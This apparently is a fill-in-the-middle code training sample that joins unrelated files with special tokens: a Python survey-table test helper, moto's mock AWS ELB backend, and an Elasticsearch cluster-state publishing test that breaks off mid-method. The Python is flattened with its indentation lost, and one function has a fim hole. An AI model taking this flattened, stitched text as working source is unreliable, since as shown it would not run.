get_xy_values(meta, data, col_x, col_y, xk, yk, vk, rules_values_x, rules_values_y, others=[], rules_weight='auto'): v_method = vk.split('|')[1] relation = vk.split('|')[2] relative = vk.split('|')[3] weight = vk.split('|')[4] 
shortnam = vk.split('|')[5] condensed_x = relation.split(":")[0].startswith('x') or v_method.startswith('d.') condensed_y = relation.split(":")[1].startswith('y') if rules_weight=='auto': rules_weight = None if weight=='' else weight if rules_weight is None: rules_x = rules_values_x['unwtd'] rules_y = rules_values_y['unwtd'] else: rules_x = rules_values_x['iswtd'] rules_y = rules_values_y['iswtd'] if xk in others: fx = frequency(meta, data, x=xk) natural_x = fx.index.values.tolist() natural_x.remove((xk, 'All')) rules_x = natural_x if condensed_x: if shortnam=='Block net': rules_x = natural_x = [ (xk, 'bn1'), (xk, 'bn2'), (xk, 'bn3')] elif shortnam in ['cbase', 'ebase']: rules_x = natural_x = [(xk, 'All')] else: rules_x = natural_x = [(xk, shortnam)] elif xk=='@': if condensed_x: if shortnam=='Block net': rules_x = natural_x = [ (col_x, 'bn1'), (col_x, 'bn2'), (col_x, 'bn3')] elif shortnam in ['cbase', 'ebase']: rules_x = natural_x = [(col_y, 'All')] else: rules_x = natural_x = [(col_y, shortnam)] else: rules_x = natural_x = [(col_y, '@')] elif condensed_x: if shortnam=='Block net': rules_x = natural_x = [ (col_x, 'bn1'), (col_x, 'bn2'), (col_x, 'bn3')] elif shortnam in ['cbase', 'ebase']: rules_x = natural_x = [(xk, 'All')] else: rules_x = natural_x = [(xk, shortnam)] else: fx = frequency(meta, data, x=col_x) natural_x = fx.index.values.tolist() natural_x.remove((col_x, 'All')) if yk in others: fy = frequency(meta, data, y=yk) natural_y = fy.columns.values.tolist() natural_y.remove((yk, 'All')) rules_y = natural_y if condensed_y: if shortnam=='Block net': rules_y = natural_y = [ (yk, 'bn1'), (yk, 'bn2'), (yk, 'bn3')] elif shortnam in ['rbase']: rules_y = natural_y = [(yk, 'All')] else: rules_y = natural_y = [(yk, shortnam)] elif yk=='@': if condensed_y: if shortnam=='Block net': rules_y = natural_y = [ (col_y, 'bn1'), (col_y, 'bn2'), (col_y, 'bn3')] elif shortnam in ['rbase']: rules_y = natural_y = [(col_x, 'All')] else: rules_y = natural_y = [(col_x, shortnam)] else: rules_y = natural_y = [(col_x, '@')] elif condensed_y: if shortnam=='Block net': rules_y = natural_y = [ (col_y, 'bn1'), (col_y, 'bn2'), (col_y, 'bn3')] elif shortnam in ['rbase']: rules_y = natural_y = [(col_y, 'All')] else: rules_y = natural_y = [(col_y, shortnam)] else: fy = frequency(meta, data, y=col_y) natural_y = fy.columns.values.tolist() natural_y.remove((col_y, 'All')) return rules_x, natural_x, rules_y, natural_y def str_index_values(index): """ Make sure level 1 of the multiindex are all strings """ values = index.values.tolist() values = zip(*[zip(*values)[0], [str(i) for i in zip(*values)[1]]]) return values def confirm_index_columns(self, df, expected_x, expected_y): """ Confirms index and columns are as expected. 
""" # global COUNTER # actual_x = str_index_values(df.index) # actual_y = str_index_values(df.columns) actual_x = df.index.values.tolist() actual_y = df.columns.values.tolist() # print # print actual_x # print expected_x # print actual_y # print expected_y # Remove xtotal from columns if present if len(df.columns.levels[0])>1: actual_y = actual_y[1:] self.assertEqual(actual_x, expected_x) self.assertEqual(actual_y, expected_y) # COUNTER = COUNTER + 2 # print COUNTER def get_stack(self, meta, data, xks, yks, views, weights, extras=False, coltests=False, flag_bases=None): stack = Stack('test') stack.add_data('test', data, meta) stack.add_link(x=xks, y=yks, views=views, weights=weights) if extras or coltests: # Add a basic net net_views = ViewMapper( template={ 'method': QuantipyViews().frequency, 'kwargs': {'iterators': {'rel_to': [None, 'y']}}}) net_views.add_method( name='Net 1-3', kwargs={'logic': [1, 2, 3], 'axis': 'x', 'text': {'en-GB': '1-3'}}) stack.add_link(x=xks, y=yks, views=net_views, weights=weights) # Add block net net_views.add_method( name='Block net', kwargs={ 'logic': [ {'bn1': [1, 2]}, {'bn2': [2, 3]}, {'bn3': [1, 3]}], 'axis': 'x'}) stack.add_link(x=xks, y=yks, views=net_views.subset(['Block net']), weights=weights) # Add NPS ## TO DO # Add standard deviation stddev_views = ViewMapper( template = { 'method': QuantipyViews().descriptives, 'kwargs': {'stats': 'stddev'}}) stddev_views.add_method(name='stddev') stack.add_link(x=xks, y=yks, views=stddev_views, weights=weights) if coltests: if flag_bases is None: test_views = ViewMapper( template={ 'method': QuantipyViews().coltests, 'kwargs': { 'mimic': 'askia', 'iterators': { 'metric': ['props', 'means'], 'level': ['low', 'mid', 'high']}}}) else: test_views = ViewMapper( template={ 'method': QuantipyViews().coltests, 'kwargs': { 'mimic': 'Dim', 'flag_bases': flag_bases, 'iterators': { 'metric': ['props', 'means'], 'level': ['low', 'mid', 'high']}}}) test_views.add_method('askia tests') stack.add_link(x=xks, y=yks, views=test_views) return stack<|fim▁end|>
<|file_name|>models.py<|end_file_name|><|fim▁begin|>from __future__ import unicode_literals import datetime from boto.ec2.elb.attributes import ( LbAttributes, ConnectionSettingAttribute, ConnectionDrainingAttribute, AccessLogAttribute, CrossZoneLoadBalancingAttribute, ) from boto.ec2.elb.policies import ( Policies, OtherPolicy, ) from moto.core import BaseBackend, BaseModel from moto.ec2.models import ec2_backends from .exceptions import ( LoadBalancerNotFoundError, TooManyTagsError, BadHealthCheckDefinition, DuplicateLoadBalancerName, ) class FakeHealthCheck(BaseModel): def __init__(self, timeout, healthy_threshold, unhealthy_threshold, interval, target): self.timeout = timeout self.healthy_threshold = healthy_threshold self.unhealthy_threshold = unhealthy_threshold self.interval = interval self.target = target if not target.startswith(('HTTP', 'TCP', 'HTTPS', 'SSL')): raise BadHealthCheckDefinition class FakeListener(BaseModel): def __init__(self, load_balancer_port, instance_port, protocol, ssl_certificate_id): self.load_balancer_port = load_balancer_port self.instance_port = instance_port self.protocol = protocol.upper() self.ssl_certificate_id = ssl_certificate_id self.policy_names = [] def __repr__(self): return "FakeListener(lbp: %s, inp: %s, pro: %s, cid: %s, policies: %s)" % (self.load_balancer_port, self.instance_port, self.protocol, self.ssl_certificate_id, self.policy_names) class FakeBackend(BaseModel): def __init__(self, instance_port): self.instance_port = instance_port self.policy_names = [] def __repr__(self): return "FakeBackend(inp: %s, policies: %s)" % (self.instance_port, self.policy_names) class FakeLoadBalancer(BaseModel): def __init__(self, name, zones, ports, scheme='internet-facing', vpc_id=None, subnets=None): self.name = name self.health_check = None self.instance_ids = [] self.zones = zones self.listeners = [] self.backends = [] self.created_time = datetime.datetime.now() self.scheme = scheme self.attributes = FakeLoadBalancer.get_default_attributes() self.policies = Policies() self.policies.other_policies = [] self.policies.app_cookie_stickiness_policies = [] self.policies.lb_cookie_stickiness_policies = [] self.subnets = subnets or [] self.vpc_id = vpc_id or 'vpc-56e10e3d' self.tags = {} self.dns_name = "%s.us-east-1.elb.amazonaws.com" % (name) for port in ports: listener = FakeListener( protocol=(port.get('protocol') or port['Protocol']), load_balancer_port=( port.get('load_balancer_port') or port['LoadBalancerPort']), instance_port=( port.get('instance_port') or port['InstancePort']), ssl_certificate_id=port.get( 'ssl_certificate_id', port.get('SSLCertificateId')), ) self.listeners.append(listener) # it is unclear per the AWS documentation as to when or how backend # information gets set, so let's guess and set it here *shrug* backend = FakeBackend( instance_port=( port.get('instance_port') or port['InstancePort']), ) self.backends.append(backend) @classmethod def create_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name): properties = cloudformation_json['Properties'] elb_backend = elb_backends[region_name] new_elb = elb_backend.create_load_balancer( name=properties.get('LoadBalancerName', resource_name), zones=properties.get('AvailabilityZones', []), ports=properties['Listeners'], scheme=properties.get('Scheme', 'internet-facing'), ) instance_ids = properties.get('Instances', []) for instance_id in instance_ids: elb_backend.register_instances(new_elb.name, [instance_id]) policies = properties.get('Policies', []) port_policies = 
{} for policy in policies: policy_name = policy["PolicyName"] other_policy = OtherPolicy() other_policy.policy_name = policy_name elb_backend.create_lb_other_policy(new_elb.name, other_policy) for port in policy.get("InstancePorts", []): policies_for_port = port_policies.get(port, set()) policies_for_port.add(policy_name) port_policies[port] = policies_for_port for port, policies in port_policies.items(): elb_backend.set_load_balancer_policies_of_backend_server( new_elb.name, port, list(policies)) health_check = properties.get('HealthCheck') if health_check: elb_backend.configure_health_check( load_balancer_name=new_elb.name, timeout=health_check['Timeout'], healthy_threshold=health_check['HealthyThreshold'], unhealthy_threshold=health_check['UnhealthyThreshold'], interval=health_check['Interval'], target=health_check['Target'], ) return new_elb @classmethod def update_from_cloudformation_json(cls, original_resource, new_resource_name, cloudformation_json, region_name): cls.delete_from_cloudformation_json( original_resource.name, cloudformation_json, region_name) return cls.create_from_cloudformation_json(new_resource_name, cloudformation_json, region_name) @classmethod def delete_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name): elb_backend = elb_backends[region_name] try: elb_backend.delete_load_balancer(resource_name) except KeyError: pass @property def physical_resource_id(self): return self.name def get_cfn_attribute(self, attribute_name): from moto.cloudformation.exceptions import UnformattedGetAttTemplateException if attribute_name == 'CanonicalHostedZoneName': raise NotImplementedError( '"Fn::GetAtt" : [ "{0}" , "CanonicalHostedZoneName" ]"') elif attribute_name == 'CanonicalHostedZoneNameID': raise NotImplementedError( '"Fn::GetAtt" : [ "{0}" , "CanonicalHostedZoneNameID" ]"') elif attribute_name == 'DNSName': return self.dns_name elif attribute_name == 'SourceSecurityGroup.GroupName': raise NotImplementedError( '"Fn::GetAtt" : [ "{0}" , "SourceSecurityGroup.GroupName" ]"') elif attribute_name == 'SourceSecurityGroup.OwnerAlias': raise NotImplementedError( '"Fn::GetAtt" : [ "{0}" , "SourceSecurityGroup.OwnerAlias" ]"') raise UnformattedGetAttTemplateException() @classmethod def get_default_attributes(cls): attributes = LbAttributes() cross_zone_load_balancing = CrossZoneLoadBalancingAttribute() cross_zone_load_balancing.enabled = False attributes.cross_zone_load_balancing = cross_zone_load_balancing connection_draining = ConnectionDrainingAttribute() connection_draining.enabled = False attributes.connection_draining = connection_draining access_log = AccessLogAttribute() access_log.enabled = False attributes.access_log = access_log connection_settings = ConnectionSettingAttribute() connection_settings.idle_timeout = 60 attributes.connecting_settings = connection_settings return attributes def add_tag(self, key, value): if len(self.tags) >= 10 and key not in self.tags: raise TooManyTagsError() self.tags[key] = value def list_tags(self): return self.tags def remove_tag(self, key): if key in self.tags: del self.tags[key] def delete(self, region): ''' Not exposed as part of the ELB API - used for CloudFormation. 
''' elb_backends[region].delete_load_balancer(self.name) class ELBBackend(BaseBackend): def __init__(self, region_name=None): self.region_name = region_name self.load_balancers = {} def reset(self): region_name = self.region_name self.__dict__ = {} self.__init__(region_name) def create_load_balancer(self, name, zones, ports, scheme='internet-facing', subnets=None): vpc_id = None ec2_backend = ec2_backends[self.region_name] if subnets: subnet = ec2_backend.get_subnet(subnets[0]) vpc_id = subnet.vpc_id if name in self.load_balancers: raise DuplicateLoadBalancerName(name) new_load_balancer = FakeLoadBalancer( name=name, zones=zones, ports=ports, scheme=scheme, subnets=subnets, vpc_id=vpc_id) self.load_balancers[name] = new_load_balancer return new_load_balancer def create_load_balancer_listeners(self, name, ports): balancer = self.load_balancers.get(name, None) if balancer: for port in ports: protocol = port['protocol'] instance_port = port['instance_port'] lb_port = port['load_balancer_port'] ssl_certificate_id = port.get('sslcertificate_id') for listener in balancer.listeners: if lb_port == listener.load_balancer_port: break else: balancer.listeners.append(FakeListener( lb_port, instance_port, protocol, ssl_certificate_id)) return balancer def describe_load_balancers(self, names): balancers = self.load_balancers.values() if names: matched_balancers = [ balancer for balancer in balancers if balancer.name in names] if len(names) != len(matched_balancers): missing_elb = list(set(names) - set(matched_balancers))[0] raise LoadBalancerNotFoundError(missing_elb) return matched_balancers else: return balancers def delete_load_balancer_listeners(self, name, ports): balancer = self.load_balancers.get(name, None) listeners = [] if balancer: for lb_port in ports: for listener in balancer.listeners: if int(lb_port) == int(listener.load_balancer_port): continue else: listeners.append(listener) balancer.listeners = listeners return balancer def delete_load_balancer(self, load_balancer_name): self.load_balancers.pop(load_balancer_name, None) def get_load_balancer(self, load_balancer_name): return self.load_balancers.get(load_balancer_name) def configure_health_check(self, load_balancer_name, timeout, healthy_threshold, unhealthy_threshold, interval, target): check = FakeHealthCheck(timeout, healthy_threshold, unhealthy_threshold, interval, target) load_balancer = self.get_load_balancer(load_balancer_name) load_balancer.health_check = check return check def set_load_balancer_listener_sslcertificate(self, name, lb_port, ssl_certificate_id): balancer = self.load_balancers.get(name, None) if balancer: for idx, listener in enumerate(balancer.listeners): if lb_port == listener.load_balancer_port: balancer.listeners[ idx].ssl_certificate_id = ssl_certificate_id return balancer def register_instances(self, load_balancer_name, instance_ids): load_balancer = self.get_load_balancer(load_balancer_name)<|fim▁hole|> load_balancer.instance_ids.extend(instance_ids) return load_balancer def deregister_instances(self, load_balancer_name, instance_ids): load_balancer = self.get_load_balancer(load_balancer_name) new_instance_ids = [ instance_id for instance_id in load_balancer.instance_ids if instance_id not in instance_ids] load_balancer.instance_ids = new_instance_ids return load_balancer def set_cross_zone_load_balancing_attribute(self, load_balancer_name, attribute): load_balancer = self.get_load_balancer(load_balancer_name) load_balancer.attributes.cross_zone_load_balancing = attribute return load_balancer def 
set_access_log_attribute(self, load_balancer_name, attribute): load_balancer = self.get_load_balancer(load_balancer_name) load_balancer.attributes.access_log = attribute return load_balancer def set_connection_draining_attribute(self, load_balancer_name, attribute): load_balancer = self.get_load_balancer(load_balancer_name) load_balancer.attributes.connection_draining = attribute return load_balancer def set_connection_settings_attribute(self, load_balancer_name, attribute): load_balancer = self.get_load_balancer(load_balancer_name) load_balancer.attributes.connecting_settings = attribute return load_balancer def create_lb_other_policy(self, load_balancer_name, other_policy): load_balancer = self.get_load_balancer(load_balancer_name) if other_policy.policy_name not in [p.policy_name for p in load_balancer.policies.other_policies]: load_balancer.policies.other_policies.append(other_policy) return load_balancer def create_app_cookie_stickiness_policy(self, load_balancer_name, policy): load_balancer = self.get_load_balancer(load_balancer_name) load_balancer.policies.app_cookie_stickiness_policies.append(policy) return load_balancer def create_lb_cookie_stickiness_policy(self, load_balancer_name, policy): load_balancer = self.get_load_balancer(load_balancer_name) load_balancer.policies.lb_cookie_stickiness_policies.append(policy) return load_balancer def set_load_balancer_policies_of_backend_server(self, load_balancer_name, instance_port, policies): load_balancer = self.get_load_balancer(load_balancer_name) backend = [b for b in load_balancer.backends if int( b.instance_port) == instance_port][0] backend_idx = load_balancer.backends.index(backend) backend.policy_names = policies load_balancer.backends[backend_idx] = backend return load_balancer def set_load_balancer_policies_of_listener(self, load_balancer_name, load_balancer_port, policies): load_balancer = self.get_load_balancer(load_balancer_name) listener = [l for l in load_balancer.listeners if int( l.load_balancer_port) == load_balancer_port][0] listener_idx = load_balancer.listeners.index(listener) listener.policy_names = policies load_balancer.listeners[listener_idx] = listener return load_balancer elb_backends = {} for region in ec2_backends.keys(): elb_backends[region] = ELBBackend(region)<|fim▁end|>
<|file_name|>PublishClusterStateActionTests.java<|end_file_name|><|fim▁begin|>/* * Licensed to Elasticsearch under one or more contributor * license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright * ownership. Elasticsearch licenses this file to you under * the Apache License, Version 2.0 (the "License"); you may * not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.elasticsearch.discovery.zen.publish; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.Version; import org.elasticsearch.cluster.ClusterChangedEvent; import org.elasticsearch.cluster.ClusterName; import org.elasticsearch.cluster.ClusterState; import org.elasticsearch.cluster.ClusterStateListener; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.block.ClusterBlocks; import org.elasticsearch.cluster.metadata.IndexMetaData; import org.elasticsearch.cluster.metadata.MetaData; import org.elasticsearch.cluster.node.DiscoveryNode; import org.elasticsearch.cluster.node.DiscoveryNodes; import org.elasticsearch.common.Nullable; import org.elasticsearch.common.Randomness; import org.elasticsearch.common.collect.ImmutableOpenMap; import org.elasticsearch.common.collect.Tuple; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.logging.ESLogger; import org.elasticsearch.common.settings.ClusterSettings; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.discovery.Discovery; import org.elasticsearch.discovery.DiscoverySettings; import org.elasticsearch.discovery.zen.DiscoveryNodesProvider; import org.elasticsearch.env.NodeEnvironment; import org.elasticsearch.node.Node; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.junit.annotations.TestLogging; import org.elasticsearch.test.transport.MockTransportService; import org.elasticsearch.threadpool.TestThreadPool; import org.elasticsearch.threadpool.ThreadPool; import org.elasticsearch.transport.BytesTransportRequest; import org.elasticsearch.transport.TransportChannel; import org.elasticsearch.transport.TransportConnectionListener; import org.elasticsearch.transport.TransportResponse; import org.elasticsearch.transport.TransportResponseOptions; import org.elasticsearch.transport.TransportService; import org.junit.After; import org.junit.Before; import java.io.IOException; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import java.util.HashMap; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.concurrent.CopyOnWriteArrayList; import java.util.concurrent.CountDownLatch; import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicBoolean; import java.util.concurrent.atomic.AtomicReference; import java.util.function.Supplier; import static org.hamcrest.CoreMatchers.instanceOf; import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.emptyIterable; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.hasToString; import static 
org.hamcrest.Matchers.not; import static org.hamcrest.Matchers.notNullValue; import static org.hamcrest.Matchers.nullValue; @TestLogging("discovery.zen.publish:TRACE") public class PublishClusterStateActionTests extends ESTestCase { private static final ClusterName CLUSTER_NAME = ClusterName.CLUSTER_NAME_SETTING.getDefault(Settings.EMPTY); protected ThreadPool threadPool; protected Map<String, MockNode> nodes = new HashMap<>(); public static class MockNode implements PublishClusterStateAction.NewPendingClusterStateListener, DiscoveryNodesProvider { public final DiscoveryNode discoveryNode; public final MockTransportService service; public MockPublishAction action; public final ClusterStateListener listener; public volatile ClusterState clusterState; private final ESLogger logger; public MockNode(DiscoveryNode discoveryNode, MockTransportService service, @Nullable ClusterStateListener listener, ESLogger logger) { this.discoveryNode = discoveryNode; this.service = service; this.listener = listener; this.logger = logger; this.clusterState = ClusterState.builder(CLUSTER_NAME).nodes(DiscoveryNodes.builder().put(discoveryNode).localNodeId(discoveryNode.getId()).build()).build(); } public MockNode setAsMaster() { this.clusterState = ClusterState.builder(clusterState).nodes(DiscoveryNodes.builder(clusterState.nodes()).masterNodeId(discoveryNode.getId())).build(); return this; } public MockNode resetMasterId() { this.clusterState = ClusterState.builder(clusterState).nodes(DiscoveryNodes.builder(clusterState.nodes()).masterNodeId(null)).build(); return this; } public void connectTo(DiscoveryNode node) { service.connectToNode(node); } @Override public void onNewClusterState(String reason) { ClusterState newClusterState = action.pendingStatesQueue().getNextClusterStateToProcess(); logger.debug("[{}] received version [{}], uuid [{}]", discoveryNode.getName(), newClusterState.version(), newClusterState.stateUUID()); if (listener != null) { ClusterChangedEvent event = new ClusterChangedEvent("", newClusterState, clusterState); listener.clusterChanged(event); } if (clusterState.nodes().getMasterNode() == null || newClusterState.supersedes(clusterState)) { clusterState = newClusterState; } action.pendingStatesQueue().markAsProcessed(newClusterState); } @Override public DiscoveryNodes nodes() { return clusterState.nodes(); } } public MockNode createMockNode(final String name) throws Exception { return createMockNode(name, Settings.EMPTY); } public MockNode createMockNode(String name, Settings settings) throws Exception { return createMockNode(name, settings, null); } public MockNode createMockNode(String name, final Settings basSettings, @Nullable ClusterStateListener listener) throws Exception { final Settings settings = Settings.builder() .put("name", name) .put(TransportService.TRACE_LOG_INCLUDE_SETTING.getKey(), "", TransportService.TRACE_LOG_EXCLUDE_SETTING.getKey(), "NOTHING") .put(basSettings) .build(); MockTransportService service = buildTransportService(settings); DiscoveryNode discoveryNode = DiscoveryNode.createLocal(settings, service.boundAddress().publishAddress(), NodeEnvironment.generateNodeId(settings)); MockNode node = new MockNode(discoveryNode, service, listener, logger); node.action = buildPublishClusterStateAction(settings, service, () -> node.clusterState, node); final CountDownLatch latch = new CountDownLatch(nodes.size() * 2 + 1); TransportConnectionListener waitForConnection = new TransportConnectionListener() { @Override public void onNodeConnected(DiscoveryNode node) { 
latch.countDown(); } @Override public void onNodeDisconnected(DiscoveryNode node) { fail("disconnect should not be called " + node); } }; node.service.addConnectionListener(waitForConnection); for (MockNode curNode : nodes.values()) { curNode.service.addConnectionListener(waitForConnection); curNode.connectTo(node.discoveryNode); node.connectTo(curNode.discoveryNode); } node.connectTo(node.discoveryNode); assertThat("failed to wait for all nodes to connect", latch.await(5, TimeUnit.SECONDS), equalTo(true)); for (MockNode curNode : nodes.values()) { curNode.service.removeConnectionListener(waitForConnection); } node.service.removeConnectionListener(waitForConnection); if (nodes.put(name, node) != null) { fail("Node with the name " + name + " already exist"); } return node; } public MockTransportService service(String name) { MockNode node = nodes.get(name); if (node != null) { return node.service; } return null; } public PublishClusterStateAction action(String name) { MockNode node = nodes.get(name); if (node != null) { return node.action; } return null; } @Override @Before public void setUp() throws Exception { super.setUp(); threadPool = new TestThreadPool(getClass().getName()); } @Override @After public void tearDown() throws Exception { super.tearDown(); for (MockNode curNode : nodes.values()) { curNode.action.close(); curNode.service.close(); } terminate(threadPool); } protected MockTransportService buildTransportService(Settings settings) { MockTransportService transportService = MockTransportService.local(Settings.EMPTY, Version.CURRENT, threadPool); transportService.start(); transportService.acceptIncomingRequests(); return transportService; } protected MockPublishAction buildPublishClusterStateAction( Settings settings, MockTransportService transportService, Supplier<ClusterState> clusterStateSupplier, PublishClusterStateAction.NewPendingClusterStateListener listener ) { DiscoverySettings discoverySettings = new DiscoverySettings(settings, new ClusterSettings(settings, ClusterSettings.BUILT_IN_CLUSTER_SETTINGS)); return new MockPublishAction( settings, transportService, clusterStateSupplier, listener, discoverySettings, CLUSTER_NAME); } public void testSimpleClusterStatePublishing() throws Exception { MockNode nodeA = createMockNode("nodeA", Settings.EMPTY).setAsMaster(); MockNode nodeB = createMockNode("nodeB", Settings.EMPTY); // Initial cluster state ClusterState clusterState = nodeA.clusterState; // cluster state update - add nodeB DiscoveryNodes discoveryNodes = DiscoveryNodes.builder(clusterState.nodes()).put(nodeB.discoveryNode).build(); ClusterState previousClusterState = clusterState; clusterState = ClusterState.builder(clusterState).nodes(discoveryNodes).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, previousClusterState); assertSameStateFromFull(nodeB.clusterState, clusterState); // cluster state update - add block previousClusterState = clusterState; clusterState = ClusterState.builder(clusterState).blocks(ClusterBlocks.builder().addGlobalBlock(MetaData.CLUSTER_READ_ONLY_BLOCK)).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, previousClusterState); assertSameStateFromDiff(nodeB.clusterState, clusterState); assertThat(nodeB.clusterState.blocks().global().size(), equalTo(1)); // cluster state update - remove block previousClusterState = clusterState; clusterState = ClusterState.builder(clusterState).blocks(ClusterBlocks.EMPTY_CLUSTER_BLOCK).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, 
previousClusterState); assertSameStateFromDiff(nodeB.clusterState, clusterState); assertTrue(nodeB.clusterState.wasReadFromDiff()); // Adding new node - this node should get full cluster state while nodeB should still be getting diffs MockNode nodeC = createMockNode("nodeC", Settings.EMPTY); // cluster state update 3 - register node C previousClusterState = clusterState; discoveryNodes = DiscoveryNodes.builder(discoveryNodes).put(nodeC.discoveryNode).build(); clusterState = ClusterState.builder(clusterState).nodes(discoveryNodes).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, previousClusterState); assertSameStateFromDiff(nodeB.clusterState, clusterState); // First state assertSameStateFromFull(nodeC.clusterState, clusterState); // cluster state update 4 - update settings previousClusterState = clusterState; MetaData metaData = MetaData.builder(clusterState.metaData()).transientSettings(Settings.builder().put("foo", "bar").build()).build(); clusterState = ClusterState.builder(clusterState).metaData(metaData).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, previousClusterState); assertSameStateFromDiff(nodeB.clusterState, clusterState); assertThat(nodeB.clusterState.blocks().global().size(), equalTo(0)); assertSameStateFromDiff(nodeC.clusterState, clusterState); assertThat(nodeC.clusterState.blocks().global().size(), equalTo(0)); // cluster state update - skipping one version change - should request full cluster state previousClusterState = ClusterState.builder(clusterState).incrementVersion().build(); clusterState = ClusterState.builder(clusterState).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, previousClusterState); assertSameStateFromFull(nodeB.clusterState, clusterState); assertSameStateFromFull(nodeC.clusterState, clusterState); assertFalse(nodeC.clusterState.wasReadFromDiff()); // node A steps down from being master nodeA.resetMasterId(); nodeB.resetMasterId(); nodeC.resetMasterId(); // node B becomes the master and sends a version of the cluster state that goes back discoveryNodes = DiscoveryNodes.builder(discoveryNodes) .put(nodeA.discoveryNode) .put(nodeB.discoveryNode) .put(nodeC.discoveryNode) .masterNodeId(nodeB.discoveryNode.getId()) .localNodeId(nodeB.discoveryNode.getId()) .build(); previousClusterState = ClusterState.builder(new ClusterName("test")).nodes(discoveryNodes).build(); clusterState = ClusterState.builder(clusterState).nodes(discoveryNodes).incrementVersion().build(); publishStateAndWait(nodeB.action, clusterState, previousClusterState); assertSameStateFromFull(nodeA.clusterState, clusterState); assertSameStateFromFull(nodeC.clusterState, clusterState); } public void testUnexpectedDiffPublishing() throws Exception { MockNode nodeA = createMockNode("nodeA", Settings.EMPTY, event -> { fail("Shouldn't send cluster state to myself"); }).setAsMaster(); MockNode nodeB = createMockNode("nodeB", Settings.EMPTY); // Initial cluster state with both states - the second node still shouldn't get diff even though it's present in the previous cluster state DiscoveryNodes discoveryNodes = DiscoveryNodes.builder(nodeA.nodes()).put(nodeB.discoveryNode).build(); ClusterState previousClusterState = ClusterState.builder(CLUSTER_NAME).nodes(discoveryNodes).build(); ClusterState clusterState = ClusterState.builder(previousClusterState).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, previousClusterState); assertSameStateFromFull(nodeB.clusterState, clusterState); // cluster 
state update - add block previousClusterState = clusterState; clusterState = ClusterState.builder(clusterState).blocks(ClusterBlocks.builder().addGlobalBlock(MetaData.CLUSTER_READ_ONLY_BLOCK)).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, previousClusterState); assertSameStateFromDiff(nodeB.clusterState, clusterState); } public void testDisablingDiffPublishing() throws Exception { Settings noDiffPublishingSettings = Settings.builder().put(DiscoverySettings.PUBLISH_DIFF_ENABLE_SETTING.getKey(), false).build(); MockNode nodeA = createMockNode("nodeA", noDiffPublishingSettings, new ClusterStateListener() { @Override public void clusterChanged(ClusterChangedEvent event) { fail("Shouldn't send cluster state to myself"); } }); MockNode nodeB = createMockNode("nodeB", noDiffPublishingSettings, new ClusterStateListener() { @Override public void clusterChanged(ClusterChangedEvent event) { assertFalse(event.state().wasReadFromDiff()); } }); // Initial cluster state DiscoveryNodes discoveryNodes = DiscoveryNodes.builder().put(nodeA.discoveryNode).localNodeId(nodeA.discoveryNode.getId()).masterNodeId(nodeA.discoveryNode.getId()).build(); ClusterState clusterState = ClusterState.builder(CLUSTER_NAME).nodes(discoveryNodes).build(); // cluster state update - add nodeB discoveryNodes = DiscoveryNodes.builder(discoveryNodes).put(nodeB.discoveryNode).build(); ClusterState previousClusterState = clusterState; clusterState = ClusterState.builder(clusterState).nodes(discoveryNodes).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, previousClusterState); // cluster state update - add block previousClusterState = clusterState; clusterState = ClusterState.builder(clusterState).blocks(ClusterBlocks.builder().addGlobalBlock(MetaData.CLUSTER_READ_ONLY_BLOCK)).incrementVersion().build(); publishStateAndWait(nodeA.action, clusterState, previousClusterState); } /** * Test not waiting on publishing works correctly (i.e., publishing times out) */ public void testSimultaneousClusterStatePublishing() throws Exception { int numberOfNodes = randomIntBetween(2, 10); int numberOfIterations = scaledRandomIntBetween(5, 50); Settings settings = Settings.builder().put(DiscoverySettings.PUBLISH_DIFF_ENABLE_SETTING.getKey(), randomBoolean()).build(); MockNode master = createMockNode("node0", settings, new ClusterStateListener() { @Override public void clusterChanged(ClusterChangedEvent event) { assertProperMetaDataForVersion(event.state().metaData(), event.state().version()); } }).setAsMaster(); DiscoveryNodes.Builder discoveryNodesBuilder = DiscoveryNodes.builder(master.nodes()); for (int i = 1; i < numberOfNodes; i++) { final String name = "node" + i; final MockNode node = createMockNode(name, settings, new ClusterStateListener() { @Override public void clusterChanged(ClusterChangedEvent event) { assertProperMetaDataForVersion(event.state().metaData(), event.state().version()); } }); discoveryNodesBuilder.put(node.discoveryNode); } AssertingAckListener[] listeners = new AssertingAckListener[numberOfIterations]; DiscoveryNodes discoveryNodes = discoveryNodesBuilder.build(); MetaData metaData = MetaData.EMPTY_META_DATA; ClusterState clusterState = ClusterState.builder(CLUSTER_NAME).metaData(metaData).build(); ClusterState previousState; for (int i = 0; i < numberOfIterations; i++) { previousState = clusterState; metaData = buildMetaDataForVersion(metaData, i + 1); clusterState = 
